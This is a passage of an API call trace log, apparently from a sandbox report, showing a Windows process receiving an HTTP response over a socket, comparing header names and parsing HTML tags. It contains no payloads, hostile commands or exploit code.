dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="G", cchCount2=1) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="GMT", cchCount2=3) returned 2 [0221.699] GetTimeZoneInformation (in: lpTimeZoneInformation=0x68ff3d0 | out: lpTimeZoneInformation=0x68ff3d0) returned 0x2 [0221.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Last-Modified", cchCount2=13) returned 1 [0221.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Last-Modified", cchCount2=13) returned 3 [0221.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Last-Modified", cchCount2=13) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Last-Modified", cchCount2=13) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Last-Modified", cchCount2=13) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Last-Modified", cchCount2=13) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Language", cchCount1=16, lpString2="Last-Modified", cchCount2=13) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Expires", cchCount2=7) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Expires", cchCount2=7) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Expires", cchCount2=7) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Expires", cchCount2=7) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Expires", cchCount2=7) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Expires", cchCount2=7) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Language", cchCount1=16, lpString2="Expires", cchCount2=7) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="ETag", cchCount2=4) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="ETag", cchCount2=4) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="ETag", cchCount2=4) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="ETag", cchCount2=4) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="ETag", cchCount2=4) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="ETag", cchCount2=4) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Language", cchCount1=16, lpString2="ETag", cchCount2=4) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Pragma", cchCount2=6) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Pragma", cchCount2=6) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Pragma", cchCount2=6) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Pragma", cchCount2=6) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Pragma", cchCount2=6) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Pragma", cchCount2=6) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Language", cchCount1=16, lpString2="Pragma", cchCount2=6) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Transfer-Encoding", cchCount2=17) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Transfer-Encoding", cchCount2=17) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Transfer-Encoding", cchCount2=17) returned 3 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Transfer-Encoding", cchCount2=17) returned 1 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Transfer-Encoding", cchCount2=17) returned 2 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Location", cchCount2=8) returned 1 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Location", cchCount2=8) returned 3 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Location", cchCount2=8) returned 3 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Location", cchCount2=8) returned 1 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Location", cchCount2=8) returned 3 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Location", cchCount2=8) returned 1 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Language", cchCount1=16, lpString2="Location", cchCount2=8) returned 1 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Server", cchCount2=6) returned 1 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Server", cchCount2=6) returned 2 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Proxy-Connection", cchCount2=16) returned 1 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Proxy-Connection", cchCount2=16) returned 3 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Proxy-Connection", cchCount2=16) returned 3 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Proxy-Connection", cchCount2=16) returned 1 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Proxy-Connection", cchCount2=16) returned 3 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Proxy-Connection", cchCount2=16) returned 1 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Language", cchCount1=16, lpString2="Proxy-Connection", cchCount2=16) returned 1 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WWW-Authenticate", cchCount1=16, lpString2="Date", cchCount2=4) returned 3 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WWW-Authenticate", cchCount1=16, lpString2="Server", cchCount2=6) returned 3 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WWW-Authenticate", cchCount1=16, lpString2="Vary", cchCount2=4) returned 3 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WWW-Authenticate", cchCount1=16, lpString2="Accept-Ranges", cchCount2=13) returned 3 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WWW-Authenticate", cchCount1=16, lpString2="Transfer-Encoding", cchCount2=17) returned 3 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WWW-Authenticate", cchCount1=16, lpString2="Content-Type", cchCount2=12) returned 3 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WWW-Authenticate", cchCount1=16, lpString2="Content-Language", cchCount2=16) returned 3 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Proxy-Authenticate", cchCount1=18, lpString2="Date", cchCount2=4) returned 3 [0221.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Proxy-Authenticate", cchCount1=18, lpString2="Server", cchCount2=6) returned 1 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Proxy-Authenticate", cchCount1=18, lpString2="Vary", cchCount2=4) returned 1 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Proxy-Authenticate", cchCount1=18, lpString2="Accept-Ranges", cchCount2=13) returned 3 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Proxy-Authenticate", cchCount1=18, lpString2="Transfer-Encoding", cchCount2=17) returned 1 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Proxy-Authenticate", cchCount1=18, lpString2="Content-Type", cchCount2=12) returned 3 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Proxy-Authenticate", cchCount1=18, lpString2="Content-Language", cchCount2=16) returned 3 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Accept-Ranges", cchCount2=13) returned 3 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Accept-Ranges", cchCount2=13) returned 3 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Accept-Ranges", cchCount2=13) returned 3 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Accept-Ranges", cchCount2=13) returned 2 [0221.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff401, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0221.703] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xb44 [0221.703] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x610 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Date", cchCount2=4) returned 3 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Server", cchCount2=6) returned 3 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Vary", cchCount2=4) returned 1 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Accept-Ranges", cchCount2=13) returned 3 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Transfer-Encoding", cchCount2=17) returned 1 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Type", cchCount2=12) returned 3 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Language", cchCount2=16) returned 3 [0221.703] GetCurrentThreadId () returned 0xc04 [0221.703] GetCurrentThreadId () returned 0xc04 [0221.703] GetCurrentThreadId () returned 0xc04 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="HEAD", cchCount2=4) returned 1 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="HEAD", cchCount2=4) returned 1 [0221.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/html", cchCount1=9, lpString2="text/html", cchCount2=9) returned 2 [0221.704] LoadStringW (in: hInstance=0x6ba0000, uID=0xfe6e, lpBuffer=0x68fd47c, cchBufferMax=4096 | out: lpBuffer="Chunk Started") returned 0xd [0221.704] GetTickCount () returned 0x3ee25 [0221.704] GetTickCount () returned 0x3ee25 [0221.704] GetTickCount () returned 0x3ee25 [0221.704] GetTickCount () returned 0x3ee25 [0221.704] GetTickCount () returned 0x3ee25 [0221.704] GetTickCount () returned 0x3ee25 [0221.704] select (in: nfds=0, readfds=0x68ff25c, writefds=0x0, exceptfds=0x0, timeout=0x68ff244 | out: readfds=0x68ff25c, writefds=0x0, exceptfds=0x0) returned 1 [0221.704] recv (in: s=0xb34, buf=0x7100b38, len=32768, flags=0 | out: buf=0x7100b38*) returned 453 [0221.704] GetTickCount () returned 0x3ee25 [0221.704] GetTickCount () returned 0x3ee25 [0221.704] GetTickCount () returned 0x3ee25 [0221.704] GetTickCount () returned 0x3ee25 [0221.704] GetTickCount () returned 0x3ee25 [0221.704] GetTickCount () returned 0x3ee25 [0221.705] GetTickCount () returned 0x3ee25 [0221.705] GetTickCount () returned 0x3ee25 [0221.705] GetTickCount () returned 0x3ee25 [0221.705] select (in: nfds=0, readfds=0x68ff234, writefds=0x0, exceptfds=0x0, timeout=0x68ff21c | out: readfds=0x68ff234, writefds=0x0, exceptfds=0x0) returned 1 [0221.705] recv (in: s=0xb34, buf=0x7100b38, len=32768, flags=0 | out: buf=0x7100b38*) returned 246 [0221.705] GetTickCount () returned 0x3ee25 [0221.705] GetTickCount () returned 0x3ee25 [0221.705] GetTickCount () returned 0x3ee25 [0221.705] GetTickCount () returned 0x3ee25 [0221.705] GetTickCount () returned 0x3ee25 [0221.705] GetTickCount () returned 0x3ee25 [0221.705] GetTickCount () returned 0x3ee25 [0221.705] GetTickCount () returned 0x3ee25 [0221.705] GetTickCount () returned 0x3ee25 [0221.705] GetTickCount () returned 0x3ee25 [0221.705] select (in: nfds=0, readfds=0x68ff234, writefds=0x0, exceptfds=0x0, timeout=0x68ff21c | out: readfds=0x68ff234, writefds=0x0, exceptfds=0x0) returned 1 [0221.706] recv (in: s=0xb34, buf=0x7100b38, len=32768, flags=0 | out: buf=0x7100b38*) returned 200 [0221.706] GetTickCount () returned 0x3ee25 [0221.706] GetTickCount () returned 0x3ee25 [0221.706] GetTickCount () returned 0x3ee25 [0221.706] GetTickCount () returned 0x3ee25 [0221.706] GetTickCount () returned 0x3ee25 [0221.706] GetTickCount () returned 0x3ee25 [0221.706] GetTickCount () returned 0x3ee25 [0221.706] GetTickCount () returned 0x3ee25 [0221.706] select (in: nfds=0, readfds=0x68ff254, writefds=0x0, exceptfds=0x0, timeout=0x68ff23c | out: readfds=0x68ff254, writefds=0x0, exceptfds=0x0) returned 1 [0221.707] recv (in: s=0xb34, buf=0x70f6ad8, len=32768, flags=0 | out: buf=0x70f6ad8*) returned 9 [0221.707] GetTickCount () returned 0x3ee25 [0221.707] GetTickCount () returned 0x3ee25 [0221.707] GetTickCount () returned 0x3ee25 [0221.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xml", cchCount1=3, lpString2="HTML", cchCount2=4) returned 3 [0221.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCTYPE", cchCount1=7, lpString2="HTML", cchCount2=4) returned 1 [0221.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="html", cchCount1=4, lpString2="HTML", cchCount2=4) returned 2 [0221.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="head", cchCount1=4, lpString2="TITLE", cchCount2=5) returned 1 [0221.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="head", cchCount1=4, lpString2="HEAD", cchCount2=4) returned 2 [0221.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="title", cchCount1=5, lpString2="META", cchCount2=4) returned 3 [0221.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="title", cchCount1=5, lpString2="TITLE", cchCount2=5) returned 2 [0221.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="title", cchCount1=5, lpString2="TITLE", cchCount2=5) returned 2 [0221.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="link", cchCount1=4, lpString2="META", cchCount2=4) returned 1 [0221.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="link", cchCount1=4, lpString2="TITLE", cchCount2=5) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="link", cchCount1=4, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="link", cchCount1=4, lpString2="LINK", cchCount2=4) returned 2 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="style", cchCount1=5, lpString2="META", cchCount2=4) returned 3 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="style", cchCount1=5, lpString2="TITLE", cchCount2=5) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="style", cchCount1=5, lpString2="SCRIPT", cchCount2=6) returned 3 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="style", cchCount1=5, lpString2="LINK", cchCount2=4) returned 3 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="META", cchCount2=4) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TITLE", cchCount2=5) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="LINK", cchCount2=4) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="META", cchCount2=4) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TITLE", cchCount2=5) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="LINK", cchCount2=4) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="META", cchCount2=4) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TITLE", cchCount2=5) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="LINK", cchCount2=4) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="body", cchCount1=4, lpString2="META", cchCount2=4) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="body", cchCount1=4, lpString2="TITLE", cchCount2=5) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="body", cchCount1=4, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="body", cchCount1=4, lpString2="LINK", cchCount2=4) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h1", cchCount1=2, lpString2="META", cchCount2=4) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h1", cchCount1=2, lpString2="TITLE", cchCount2=5) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h1", cchCount1=2, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h1", cchCount1=2, lpString2="LINK", cchCount2=4) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="META", cchCount2=4) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TITLE", cchCount2=5) returned 1 [0221.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="LINK", cchCount2=4) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="META", cchCount2=4) returned 3 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="TITLE", cchCount2=5) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="LINK", cchCount2=4) returned 3 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="META", cchCount2=4) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TITLE", cchCount2=5) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="LINK", cchCount2=4) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="META", cchCount2=4) returned 3 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="TITLE", cchCount2=5) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="LINK", cchCount2=4) returned 3 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="META", cchCount2=4) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="TITLE", cchCount2=5) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="LINK", cchCount2=4) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="META", cchCount2=4) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TITLE", cchCount2=5) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="LINK", cchCount2=4) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="META", cchCount2=4) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TITLE", cchCount2=5) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="LINK", cchCount2=4) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h2", cchCount1=2, lpString2="META", cchCount2=4) returned 1 [0221.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h2", cchCount1=2, lpString2="TITLE", cchCount2=5) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h2", cchCount1=2, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h2", cchCount1=2, lpString2="LINK", cchCount2=4) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="META", cchCount2=4) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TITLE", cchCount2=5) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="LINK", cchCount2=4) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="address", cchCount1=7, lpString2="META", cchCount2=4) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="address", cchCount1=7, lpString2="TITLE", cchCount2=5) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="address", cchCount1=7, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="address", cchCount1=7, lpString2="LINK", cchCount2=4) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="META", cchCount2=4) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="TITLE", cchCount2=5) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="LINK", cchCount2=4) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="META", cchCount2=4) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TITLE", cchCount2=5) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="LINK", cchCount2=4) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="br", cchCount1=2, lpString2="META", cchCount2=4) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="br", cchCount1=2, lpString2="TITLE", cchCount2=5) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="br", cchCount1=2, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="br", cchCount1=2, lpString2="LINK", cchCount2=4) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="span", cchCount1=4, lpString2="META", cchCount2=4) returned 3 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="span", cchCount1=4, lpString2="TITLE", cchCount2=5) returned 1 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="span", cchCount1=4, lpString2="SCRIPT", cchCount2=6) returned 3 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="span", cchCount1=4, lpString2="LINK", cchCount2=4) returned 3 [0221.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="META", cchCount2=4) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TITLE", cchCount2=5) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="LINK", cchCount2=4) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="META", cchCount2=4) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TITLE", cchCount2=5) returned 